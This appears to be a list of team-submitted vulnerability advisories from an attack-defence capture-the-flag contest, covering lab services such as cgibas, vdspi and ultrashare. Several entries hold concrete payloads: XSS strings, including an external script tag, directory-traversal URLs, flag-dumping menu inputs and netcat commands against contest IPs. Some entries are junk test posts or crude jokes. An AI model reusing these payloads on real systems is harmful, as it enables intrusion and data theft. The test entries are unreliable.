Advisories

foo (rl)

New advisory by : hc
Affected service(s): foo
Severity [lmh] : rl

===== Problem =====
viel stress hier

===== Impact =====
foo

===== Fix =====
bla

zweites (foo)

New advisory by : hc
Affected service(s): zweites
Severity [lmh] : foo

===== Problem =====
bar

===== Impact =====

===== Fix =====

noch ein advi (sory, high)

New advisory by : hc
Affected service(s): noch ein advi
Severity [lmh] : sory, high

===== Problem =====
hallo welt
foo

===== Impact =====
bar

===== Fix =====
a.b.c.d

(low)

New advisory by : ailurotest
Affected service(s):
Severity [lmh] : low

===== Problem =====
Test problem

===== Impact =====
Kills internets

===== Fix =====
Pending.

testing123 (low)

New advisory by : ailurotest
Affected service(s): testing123
Severity [lmh] : low

===== Problem =====
test

===== Impact =====
test

===== Fix =====
test

cgibass (high)

New advisory by : slashd
Affected service(s): cgibass
Severity [lmh] : high

===== Problem =====
The confenicial information lise in free access
===== Impact =====
http://10.23.1.3/cgi/index.bas?inc=download.bas&gimme=91cc2eb9

s

ultrashare (high)

New advisory by : churchy
Affected service(s): ultrashare
Severity [lmh] : high

Hello ladies and gentlemen from all over the world,

===== Problem =====
The ultrashare service allows user to share (upload and download) files. The service is implemented in...

cgibas (medium)

New advisory by : slashd
Affected service(s): cgibas
Severity [lmh] : medium

===== Problem =====
Directory cgi/ readible
===== Impact =====

===== Fix =====

VDspi (high)

New advisory by : fid
Affected service(s): VDspi
Severity [lmh] : high

===== Problem =====
Flags a saved as comment in a record and can read out without authentification by everyone

===== Impact =====

===== Fix =====

restrict the access with username a...

cgibas (medium)

New advisory by : slashd
Affected service(s): cgibas
Severity [lmh] : medium

===== Problem =====
XSS attack
===== Impact =====
http://10.23.1.3/cgi/search.bas?inc=search.bas&term=%27%3E%3Cscript%3Ealert(%27xxs%27)%3C/script%3E

===== Fix =====

cgibas (medium)

New advisory by : slashd
Affected service(s): cgibas
Severity [lmh] : medium

===== Problem =====
XSS bug
===== Impact =====
http://10.23.1.3/cgi/index.bas?inc=search.bas&term=%3Cscript%3Ealert(%27xss%27)%3C%2Fscript%3E
===== Fix =====

ICANHASGOFERDEE (high)

New advisory by : ailurotest
Affected service(s): ICANHASGOFERDEE
Severity [lmh] : high

===== Problem =====
The service runs a daemon written in lolcode
without performing proper input sanitizing.
FLAGSTORE command allows to execute commands in the server...

lighttpd/web2.0 (low)

New advisory by : lwi
Affected service(s): lighttpd/web2.0
Severity [lmh] : low

===== Problem =====
Directory traversal vuln
http://10.65.1.3/cgi/index.bas?inc=download.bas&gimme=../../../../var/www/foo

===== Impact =====
We can read every file reada...

cgibas (high)

New advisory by : slashd
Affected service(s): cgibas
Severity [lmh] : high

===== Problem =====
Read file on filesystem
===== Impact =====
Create the post
http://10.23.1.3/cgi/index.bas?inc=upload.bas
input in "Caption" "../../../../../../e...

vdspi (low)

New advisory by : thorben
Affected service(s): vdspi
Severity [lmh] : low

===== Problem =====
vdspi has loginshell
===== Impact =====
daemons should not have login shells
===== Fix =====
edit /etc/passwd and change loginshell of vdspi from /bin/sh to /bin...

goffer (low)

New advisory by : thorben
Affected service(s): goffer
Severity [lmh] : low

===== Problem =====
goffer has loginshell
===== Impact =====
daemons should not have login shells
===== Fix =====
edit /etc/passwd and change loginshell of goffer from /bin/sh to /...

cgibas (high)

New advisory by : Samsa
Affected service(s): cgibas
Severity [lmh] : high

===== Problem =====
The 'inc' variable is not sanatized in index.bas before being used to include a file. This allows an attacker to include any arbritrary file on the system leadin...

CGIBASS (high)

New advisory by : anonymous coward
Affected service(s): CGIBASS
Severity [lmh] : high

===== Problem =====
Directory /var/www/cgi is readable

===== Impact =====

===== Fix =====
.htaccess in /var/www/cgi mit "Options -Indexes"

vdspi (medium)

New advisory by : cjay
Affected service(s): vdspi
Severity [lmh] : medium

===== Problem =====
vdspi is started as root via daemon tools
===== Impact =====
unnecessary risk
===== Fix =====
change the last line of /etc/vdspi/run to:
cd /usr/vdspi &&...

cgibas (medium)

New advisory by : lamer
Affected service(s): cgibas
Severity [lmh] : medium

===== Problem =====
download.bas lists all files in /var/data/cgibas
===== Impact =====
can download all files under /var/data/cgibas
===== Fix =====
remove line 121, open dir...
...

cgibas (high)

/etc/passwd (low)

New advisory by : thorben
Affected service(s): /etc/passwd
Severity [lmh] : low

===== Problem =====
loginshells for non-physical users (i.e. services/daemons) in /etc/passwd set to /bin/sh
===== Impact =====
potentially vulnerable services/daemons could a...

CGIBAS (high)

New advisory by : manager
Affected service(s): CGIBAS
Severity [lmh] : high

===== Problem =====
Download.bas lists files that contain the flags

===== Impact =====
highly critical

===== Fix =====
fix upload.bas to not write the caption into dir-listing
1...

system (medium)

New advisory by : fid
Affected service(s): system
Severity [lmh] : medium

===== Problem =====
weak passwords from users goopher and vdspi found pretty fast with john
===== Impact =====
other users can log in remotely
===== Fix =====
change passwords

cgibas (medium)

New advisory by : Samsa
Affected service(s): cgibas
Severity [lmh] : medium

===== Problem =====
We can access the source code of the files stored on /cgi/ using the port 81 as the configuration allows it.

For instance :

http://192.168.2.33:81/cgi/index....

ICANHASGOFERDEE (medium)

New advisory by : ailurotest
Affected service(s): ICANHASGOFERDEE
Severity [lmh] : medium

===== Problem =====
The service runs a daemon written in lolcode
without performing proper input sanitizing.
FLAGSTORE command allows to execute commands in the serv...

cgibas (high)

New advisory by : lamer
Affected service(s): cgibas
Severity [lmh] : high

===== Problem =====
upload.bas allows write to any file with directory traversal (..)
===== Impact =====
write to any file
===== Fix =====
500 let idx=index$(caption,"..")...

vdspi (high)

New advisory by : Ge0rG
Affected service(s): vdspi
Severity [lmh] : high

===== Problem =====
In ui-debug_menu.adb, there is a root shell accessible via menu 9 -> 5,
"maintainance shell" menu. it allows full access to the system.

===== Impac...

vdspi (high)

New advisory by : Ge0rG
Affected service(s): vdspi
Severity [lmh] : high

===== Problem =====
By sending an ASCII BEL character, a root shell is spawned.

===== Impact =====
A complete system compromise is possible, including reading flags.

===== Fix ====...

vdspi (low)

New advisory by : lamer
Affected service(s): vdspi
Severity [lmh] : low

===== Problem =====
VDSPI does not release db file lock when error occurs
===== Impact =====
DoS
===== Fix =====
don't know enough ADA to fix, and there are too many places to fix

vdspi (high)

New advisory by : het
Affected service(s): vdspi
Severity [lmh] : high

===== Problem =====
string length is not checked

for example :
first, last, comment : String (1..1024);
then
Ada.Text_IO.Get_Line (last, nl);

===== Impact =====
pussibl...

vdspi (low)

New advisory by : lamer
Affected service(s): vdspi
Severity [lmh] : low

===== Problem =====
vdspi does search for name only checks __lengths__, not contents
===== Impact =====
search all db records
===== Fix =====
don't know enough ADA to fix

gopherdee (high)

New advisory by : lamer
Affected service(s): gopherdee
Severity [lmh] : high

===== Problem =====
Directory traversal
===== Impact =====
Can read /etc/passwd
===== Fix =====
No clue, LOL

cgibass (high)

New advisory by : slashd
Affected service(s): cgibass
Severity [lmh] : high

===== Problem =====
The confidencial information lise in free access
===== Impact =====
http://10.23.1.3/cgi/index.bas?inc=download.bas&gimme=91cc2eb9
===== Fix =====
add .ht...

LeetWWW (low)

New advisory by : Ge0rG
Affected service(s): LeetWWW
Severity [lmh] : low

===== Problem =====

The RFC does not specify on what port the service has to be run.

===== Impact =====

Different implementations have a chance of 1:65535 to actually match ports...

vdspi (high)

New advisory by : thaidn
Affected service(s): vdspi
Severity [lmh] : high

===== Problem =====
By entering 5 in DEBUG menu, a root shell is spawned.

===== Impact =====

do anything to the host

===== Fix =====
The shell access can be disabled by removing...

vdspi (low)

New advisory by : Ge0rG
Affected service(s): vdspi
Severity [lmh] : low

===== Problem =====

Certain IDs can crash the service, causing a DoS.

The following calculation in persondb.adb causes the Log() function to
terminate the application:

"n : ID...

cgbas (medium)

New advisory by : slashd
Affected service(s): cgbas
Severity [lmh] : medium

===== Problem =====
We can access the source code of the files stored on /cgi/ on port 81 as the configuration allows it.

===== Impact =====
Source code disclosure of the cgi dir...

unknown/several (high)

New advisory by : anonymous coward
Affected service(s): unknown/several
Severity [lmh] : high

===== Problem =====
A botnet is running with bots connecting per the IRC protocol to 10.5.1.99 on port 24051. This botnet is probably operated by h4ck!nb3rg. The...

cgibas (medium)

New advisory by : Silicium
Affected service(s): cgibas
Severity [lmh] : medium

===== Problem =====
The upload.bas allows to xss javascript.

===== Impact =====
Run Scrips on Client Systems, Steal Cookies...

===== Fix =====

Filter some html taggins with ...

cgibas (medium)

New advisory by : watz
Affected service(s): cgibas
Severity [lmh] : medium

===== Problem =====

Lighttpd allows read of .htaccess or .htpasswd files

===== Impact =====

===== Fix =====

Add something like url.access-deny = ( ".htaccess", &quo...

ultrashare (medium)

New advisory by : churchy
Affected service(s): ultrashare
Severity [lmh] : medium

Hello again fellow hackers and those who (like we) desperately try to get some services running,

===== Problem =====
The application ultrashare allows users to up and down...

cgibas (medium/high)

New advisory by : Samsa
Affected service(s): cgibas
Severity [lmh] : medium/high

===== Problem =====
Search functionality can be abused to retrieve confidential data.
The search functionality uses wild cards and its content structure is know to be hexadec...

vdspi (medium)

New advisory by : lamer
Affected service(s): vdspi
Severity [lmh] : medium

===== Problem =====
Exploit to get flag.
1\n
2\n
\n
\n
===== Impact =====
Get all flags
===== Fix =====
Don't know how.

cgibas (low)

New advisory by : Ge0rG
Affected service(s): cgibas
Severity [lmh] : low

===== Problem =====

The directory traversal mentioned in #14 and #27 allows writing to the FS.

===== Impact =====

Writing to any file accessible by the daemon

===== Fix =====

Th...

ultrashare (medium)

New advisory by : js
Affected service(s): ultrashare
Severity [lmh] : medium

===== Problem =====
In line 210 of db.rb, there is an unescaped use of the variable user.

===== Impact =====
Arbitrary SQL queries can be executed.

===== Fix =====
Change owner...

vdspi (high)

New advisory by : Ge0rG
Affected service(s): vdspi
Severity [lmh] : high

===== Problem =====

ID search via menu 1 -> 3 is matching for substrings.

===== Impact =====

It is possible to easily enumerate from 0 to 9 to extract all entries in the
databa...

vdspi (low)

New advisory by : Ge0rG
Affected service(s): vdspi
Severity [lmh] : low

===== Problem =====

Certain IDs can crash the service, causing a DoS.

This is a Follow-Up for #37, providing a fix.

===== Impact =====

unpatched:

The current session is terminate...

vdspi (medium)

New advisory by : thaidn
Affected service(s): vdspi
Severity [lmh] : medium

===== Problem =====
Exploit to get flag.
1\n
2\n
\n
\n

===== Impact =====
Get all flags

===== Fix =====

vdspi (medium)

New advisory by : thaidn
Affected service(s): vdspi
Severity [lmh] : medium

===== Problem =====
Exploit to get flag.
1\n
2\n
\n
\n

===== Impact =====
Get all flags

===== Fix =====
file persondb.adb, line 106, change to this::

if first'Length >0 an...

10.131.1.2 (high)

New advisory by : js
Affected service(s): 10.131.1.2
Severity [lmh] : high

===== Problem =====
There is a backdoor shell in /usr/vdspi/ui.adb.

===== Impact =====
Executing of arbitrary code.

===== Fix =====
Comment out line 52 and 53.

vdspi (high)

New advisory by : js
Affected service(s): vdspi
Severity [lmh] : high

===== Problem =====
There is a backdoor shell in /usr/vdspi/ui.adb.

===== Impact =====
Executing of arbitrary code.

===== Fix =====
Comment out line 52 and 53.

goffer (high)

New advisory by : anonymous coward
Affected service(s): goffer
Severity [lmh] : high

===== Problem =====
The "TIKLE" command executes a command. The command is assembled by concatinating the strings "echo" and "id", as well a...

VDspi (medium)

New advisory by : adc
Affected service(s): VDspi
Severity [lmh] : medium

===== Problem =====
IDs are not sufficiently random
===== Impact =====
you can predict ids and steal information (flags)
===== Fix =====
use larger numbers and make them random

ultrashare (low)

New advisory by : watz
Affected service(s): ultrashare
Severity [lmh] : low

===== Problem =====

The variable "cgibin" in config.rb shows to the wrong path

===== Impact =====

Links in the Menu of ultrashare are wrong ...

===== Fix =====

Cha...

cgibas (medium)

New advisory by : Samsa
Affected service(s): cgibas
Severity [lmh] : medium

===== Problem =====
Shoutbox doesn't filter html characters making it vulnerable to a xss attack.

===== Impact =====
Request may be forged : For instance, storing altered data.

...

vdspi (high)

New advisory by : Ge0rG
Affected service(s): vdspi
Severity [lmh] : high

===== Problem =====

VDspi allows to search for empty names, dumping the whole database.

Reproduce:

1 -> 2 -> <enter> -> <enter>

===== Impact =====

Reading o...

ultrashare (low)

New advisory by : churchy
Affected service(s): ultrashare
Severity [lmh] : low

okaaayyy, here is our second try:

===== Problem =====
every user in the ultrashare application can change its password withou the need of entering the old password first - an...

vdspi (low)

New advisory by : scyclops
Affected service(s): vdspi
Severity [lmh] : low

===== Problem =====
VDPI does not release db file lock when error occurs
===== Impact =====
DoS
===== Fix =====
surround code in Search_By_Pred and File procedures after the Lock_F...

ultrashare (medium)

New advisory by : churchy
Affected service(s): ultrashare
Severity [lmh] : medium

Ok, here is the next one:

===== Problem =====
when a user uploads a file, a unique id is assigned to it. only the user who uploaded the file should be able to delete it. b...

cgibas (medium)

New advisory by : Samsa
Affected service(s): cgibas
Severity [lmh] : medium

===== Problem =====
Shoutbox doesn't filter html characters making it vulnerable to a xss attack. This kind of attack can be usefull to steal cookie or POST data information.

==...

CGIBAS (medium)

New advisory by : c1de0x
Affected service(s): CGIBAS
Severity [lmh] : medium

===== Problem =====

CGIBAS site is vulnerable to XSS. Adding a caption like:

<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

Will result in a javascript popup on ...

cgibas (low)

New advisory by : lwi
Affected service(s): cgibas
Severity [lmh] : low

===== Problem =====
XSS bug

http://10.72.1.3/cgi/index.bas?inc=download.bas&gimme=%3Cu%3E70%3C/u%3E for example

===== Impact =====

Steal cookies, rape people etc.

===== Fix ===...

ultrashare (low)

New advisory by : churchy
Affected service(s): ultrashare
Severity [lmh] : low

Ok, this vuln is sooo severe that it's the end of the app as we know it :)

===== Problem =====
There is a principal design error throughout the whole application. The applica...

cgibas (low)

New advisory by : bluemood
Affected service(s): cgibas
Severity [lmh] : low

===== Problem =====
Replaced to #45 for #14 and #27
===== Impact =====
Uploading illegal chars in upload.bas and get invalid file in download.bas
===== Fix =====
in upload.bas
100...

vdspi (low)

New advisory by : Samsa
Affected service(s): vdspi
Severity [lmh] : low

===== Problem =====

ID search via menu 1 -> 3 does not supports letters,
throws an unhandled exception

===== Impact =====

The service crashes

===== Fix =====

--- vdspi.old/ui-...

CGIBAS (high)

New advisory by : manager
Affected service(s): CGIBAS
Severity [lmh] : high

===== Problem =====
Uploading .bas file to the repository and executing them via inclusion in index.bas allows execution of arbitrary basic code.
The command "foo" of th...

CGIBAS (low)

New advisory by : diskin
Affected service(s): CGIBAS
Severity [lmh] : low

===== Problem =====
there is no sanitizing of the data written into the shoutbox. and of the data displayed by the shoutbox later. together these allow injection of code to the page...

VDSI (high)

New advisory by : John_K
Affected service(s): VDSI
Severity [lmh] : high

===== Problem =====
VIDs are assigned sequentially instead of randomly
===== Impact =====
Keys are easily obtainable by executing a ID Search starting at 1 until no results are retur...

VDS (high)

New advisory by : het
Affected service(s): VDS
Severity [lmh] : high

===== Problem =====
Service is seen as "Connection error" while there is traffic on the concerned port
===== Impact =====
Impossible to get credit for obtained flags for this ...

ultrashare (high)

New advisory by : lamer
Affected service(s): ultrashare
Severity [lmh] : high

===== Problem =====
Hidden command "show".
===== Impact =====
Together with the reported SQL injection, one can list all the files.
===== Fix =====
Disable the show co...

ultrashare (low)

New advisory by : churchy
Affected service(s): ultrashare
Severity [lmh] : low

Here we go:

===== Problem =====
The application ultrashare is vulnerable to xss attacks. When registering a new user the parameter "username" is susceptible. You ca...

cgibas (high)

New advisory by : adc
Affected service(s): cgibas
Severity [lmh] : high

===== Problem =====
Index.bas is doing a gosub on unfiltered user input resulting in remote code execution

===== Impact =====
Remote code execution (and command execution if you use ...

goferdee (low)

New advisory by : manager
Affected service(s): goferdee
Severity [lmh] : low

===== Problem =====
flags are readable to system users. If a team gained shell access to the system the flag are readable from the shell.

===== Impact =====
retrieval of all ser...

CGIBAS (low)

New advisory by : manager
Affected service(s): CGIBAS
Severity [lmh] : low

===== Problem =====
flags are readable to system users. If a team gained shell access to the system the flag are readable from the shell.

===== Impact =====
retrieval of all servi...

VDspi (low)

New advisory by : manager
Affected service(s): VDspi
Severity [lmh] : low

===== Problem =====
flags are readable to system users. If a team gained shell access to the system the flag are readable from the shell.

===== Impact =====
retrieval of all servic...

ultrashare (low)

New advisory by : manager
Affected service(s): ultrashare
Severity [lmh] : low

===== Problem =====
flags are readable to system users. If a team gained shell access to the system the flag are readable from the shell.

===== Impact =====
retrieval of all s...

Ultrashare (high)

New advisory by : thaidn
Affected service(s): Ultrashare
Severity [lmh] : high

===== Problem =====
curUser in main.rb can be leveraged to impersonate other users, including admins

===== Impact =====
steal other user's accounT and fileS

===== Fix =====
r...

cgibas (medium)

New advisory by : bluemood
Affected service(s): cgibas
Severity [lmh] : medium

===== Problem =====
Listing flags
===== Impact =====
Data capturing
===== Fix =====
in download.bas
change those line to:
121 rem open "dir" for input as #2
130 rem r...

goffer (medium)

New advisory by : anonymous coward
Affected service(s): goffer
Severity [lmh] : medium

===== Problem =====
When entering the command "dir", a new file "listing" with the contents of the directory (containing the flags) is created. This...

VDspi (low)

New advisory by : struppi
Affected service(s): VDspi
Severity [lmh] : low

===== Problem =====

Search by ID "n" lists all records whose ID contains substring "n"

===== Impact =====

sequentially searching for IDs 1, 2, 3, ..., 9 will ...

ultrashare (medium)

New advisory by : thaidn
Affected service(s): ultrashare
Severity [lmh] : medium

===== Problem =====
delete function in main.rb failed to check whether curUser is admin which allows any authorized user can delete account of any other users, including admi...

UltraShare (medium)

New advisory by : thaidn
Affected service(s): UltraShare
Severity [lmh] : medium

===== Problem =====
deleteFile function in main.rb failed to check whether curUser is the owner of the file to be deleted which allows any authorized user to delete files bel...

UltraShare (medium)

New advisory by : thaidn
Affected service(s): UltraShare
Severity [lmh] : medium

===== Problem =====

delete function in main.rb failed to check whether curUser is admin which allows any authorized user can delete account of any other users (but not admin...

ultrashare (low)

New advisory by : churchy
Affected service(s): ultrashare
Severity [lmh] : low

Keep it up teams, 2.5 more hours to go :)

===== Problem =====
In the file "test.rb" there is a vulnerability in the routine of the creation of random files:
filenam...

Cashflags (low)

New advisory by : adc
Affected service(s): Cashflags
Severity [lmh] : low

===== Problem =====
It is possible to intercept cashflag flags
with command execution on a vulnerable server,
just listen up on the port. Theres no form
of authenticationc
===== Im...

UltraShare (medium)

New advisory by : thaidn
Affected service(s): UltraShare
Severity [lmh] : medium

===== Problem =====
This is not a duplicated adv. My previous adv (#60) is wrong but this one is correct. Please double check. The main different is deleteFile calls @db.dele...

Goferdee (high)

New advisory by : anonymous coward
Affected service(s): Goferdee
Severity [lmh] : high

===== Problem =====
The 'dir' command, in conjuction with the purpose of the service itself, makes it possible to access flags without knowing their FLAGSTORE id. By is...

CGIBAS (high)

New advisory by : John_K
Affected service(s): CGIBAS
Severity [lmh] : high

===== Problem =====
Use CGIBASE upload.bas to overwrite a script file at an absolute path that is writable by www-data
===== Impact =====
Any file writable by www-data can be overw...

ultrashare (medium)

New advisory by : Samsa
Affected service(s): ultrashare
Severity [lmh] : medium

===== Problem =====

The application maintain the same session id in both zones,
the public and the private one. Consecuently is it possible
to steal the cookie ID using anoth...

Goferdee (low)

New advisory by : anonymous coward
Affected service(s): Goferdee
Severity [lmh] : low

===== Problem =====
FLAGSTORE command can be used to overwrite ./ls script, which is used to implement 'dir' command

===== Impact =====

===== Fix =====

Goferdee (medium)

New advisory by : anonymous coward
Affected service(s): Goferdee
Severity [lmh] : medium

===== Problem =====
FLAGSTORE command can be used to overwrite ./ls script, which is used to implement 'dir' command
===== Impact =====
Exploit: FLAGSTORE reversed_cm...

CGIBAS (low)

New advisory by : adc
Affected service(s): CGIBAS
Severity [lmh] : low

===== Problem =====
There exists a shoutbox dos , you can insert newlines
and mess up the service
===== Impact =====
you dont get any points because functionality is lost
===== Fix ===...

ultrashare (medium)

New advisory by : anonymous coward
Affected service(s): ultrashare
Severity [lmh] : medium

ultrashare (low)

New advisory by : churchy
Affected service(s): ultrashare
Severity [lmh] : low

How is the atmosphrere there in berlin? are many people watchin the local teams or the operators?

===== Problem =====
The script "test.rb" is not validating and eca...

CONTEST (HIGH)

New advisory by : adc
Affected service(s): CONTEST
Severity [lmh] : HIGH

===== Problem =====
Sitting next to too many CCCers can lead to
fuses blowing :(. This happened just hours earlier
to Janet Reno.
===== Impact =====
Sudden Death
===== Fix =====
Un...

VDspi (low)

cgibase (low)

New advisory by : BfrOv3rfl0w
Affected service(s): cgibase
Severity [lmh] : low

===== Problem =====
There is still a possible way to perform a dos on the shoutbox.
You just have to use other strings or chars than newline.
similar to #93
===== Impact ====...

Goferdee (high)

New advisory by : EQ
Affected service(s): Goferdee
Severity [lmh] : high

===== Problem =====
the flagstore part allows to modify the original execution.

===== Impact =====
remote code execution

===== Fix =====

new and better regexps.

CGIBAS (low)

New advisory by : manager
Affected service(s): CGIBAS
Severity [lmh] : low

===== Problem =====
shoutbox not working.
===== Impact =====
no communication via shouting.
===== Fix =====
we fixed several conditions of the if-commands for action and shout.
Sho...

General (low)

New advisory by : adc
Affected service(s): General
Severity [lmh] : low

===== Problem ===== 
if wolfgang's password is same for all the server and if someone can crack the password,
he can log in any system. goffer is too.

 ===== Impact ===== 
we can get...

ultrashare (low)

New advisory by : Samsa
Affected service(s): ultrashare
Severity [lmh] : low

===== Problem =====

The application is vulnerable a 'Fixed Session' attack. This attack
consists in setting the user session before the server. After that,
when the user logi...

Cashflags (low)

New advisory by : slashd
Affected service(s): Cashflags
Severity [lmh] : low

===== Problem =====
It is possible to join to netcat and to send TRASH
===== Impact =====
nC 10.64.1.3 12345 TRASH SPAM
===== Fix =====
nc -lp 12345 | grep FLAG

gopherdee (high)

New advisory by : lamer
Affected service(s): gopherdee
Severity [lmh] : high

Problem
--------
FLAGSTORE command can be used to overwrite multiple script inside /service/ICANHASGOFERDEE, includung shell scripts such as goferdee.sh, ls and run due to the w...

Goferdee (high)

New advisory by : thaidn
Affected service(s): Goferdee
Severity [lmh] : high

===== Problem =====
"dir" command save a list of files inside /service/ICANHASGOFERDEE to the 'listing' file. By keep issuing dir command and monitor the content of the...

advisory system (low)

New advisory by : anonymous coward
Affected service(s): advisory system
Severity [lmh] : low

===== Problem =====
The advisory submission system does not properly verify credentials.
===== Impact =====
You can submit an advisory as another team and make t...

cashflag (low)

New advisory by : slashd
Affected service(s): cashflag
Severity [lmh] : low

===== Problem =====
Spam in cashflag service
===== Impact =====
When other teams execute

nc -l -p 12345

he is avalebel to free connect
we do

nc team_ip 12345
Send spam, War and...

Goferdee (high)

CGIBAS (high)

New advisory by : c1de0x
Affected service(s): CGIBAS
Severity [lmh] : high

===== Problem =====
The existing fix for the directory traversal in download.bas doesn't fix absolute access.

===== Impact =====
Read any system files.

===== Fix =====

Prepend ....

ULTRASHARE (high)

New advisory by : John_K
Affected service(s): ULTRASHARE
Severity [lmh] : high

===== Problem =====
UltraShare templates are writable by www-data user. Ruby code can be appended to the templates to access private data, and execute arbitrary code as www-dat...

tcpserver (medium)

New advisory by : Samsa
Affected service(s): tcpserver
Severity [lmh] : medium

===== Problem =====

Boundary condition problem in remoteinfo.c can make a remote service to crash
with big buffers, this is done with stralloc_append(out,&ch)

To exploit...

ICANHASGOFERDEE (high)

New advisory by : thorben
Affected service(s): ICANHASGOFERDEE
Severity [lmh] : high

===== Problem =====
goferdee lists contents of arbitrary files in datadir, if the reverse of their names is known

===== Impact =====
as flags are stored in files in the ...

CGIBAS (high)

New advisory by : c1de0x
Affected service(s): CGIBAS
Severity [lmh] : high

===== Problem =====
upload.bas allows to store into absolute paths.
===== Impact =====
Overwrite/create files wherever www-data can write.
===== Fix =====
Prepend ./ to all pathnam...

teamimage (low)

New advisory by : hc
Affected service(s): teamimage
Severity [lmh] : low

We were the first to post a teamimage

ultrashare (medium)

New advisory by : adc
Affected service(s): ultrashare
Severity [lmh] : medium

===== Problem =====
There exists a CSRF vulnerability in ultrashare .
===== Impact =====
Users logged in may be coerced by a third-party website
into performing actions with the...

ultrashare (medium)

New advisory by : manager
Affected service(s): ultrashare
Severity [lmh] : medium

===== Problem =====

ultrashare discloses _all_ flags as comments in the html-sourcecode

===== Impact =====
all flags can be access by simply browsing the site

===== Fix =...

Team SquareRoots (high)

New advisory by : John_K
Affected service(s): Team SquareRoots
Severity [lmh] : high

===== Problem =====
You got pwnt.
===== Impact =====
All your points are belong to us.
===== Fix =====
Cry, then fix your software.

all? (low)

New advisory by : churchy
Affected service(s): all?
Severity [lmh] : low

===== Problem =====
the user "www-data" has write-access to the directory "/var/www/styles". if an attacker can write files to the system, some shells like a ruby...

vdspi (medium)

New advisory by : Samsa
Affected service(s): vdspi
Severity [lmh] : medium

===== Problem =====

A full database dump can be done by bruteforcing the menus.

===== Impact =====

The full database can be dumped. The range of IDs to use should
be specified t...

goffer (low)

New advisory by : anonymous coward
Affected service(s): goffer
Severity [lmh] : low

===== Problem =====
Goffer uses a shell script "ls" in place of the normal /bin/ls. Normally, this shell script only executes /bin/ls, but an attacker might get ...

CGIBAS (high)

New advisory by : John_K
Affected service(s): CGIBAS
Severity [lmh] : high

===== Problem =====
cgibas.pl has a back door in function internal_foo
===== Impact =====
Execute system commands as www-data from basic scripts.
===== Fix =====
remove internal_fo...

vdspi (medium)

New advisory by : c1de0x
Affected service(s): vdspi
Severity [lmh] : medium

===== Problem =====
see adv #119

===== Impact =====
see adv #119

===== Fix =====
change or remove the mod 1024 in person.ids:
type ID_Type is mod 1024
using some value like 6553...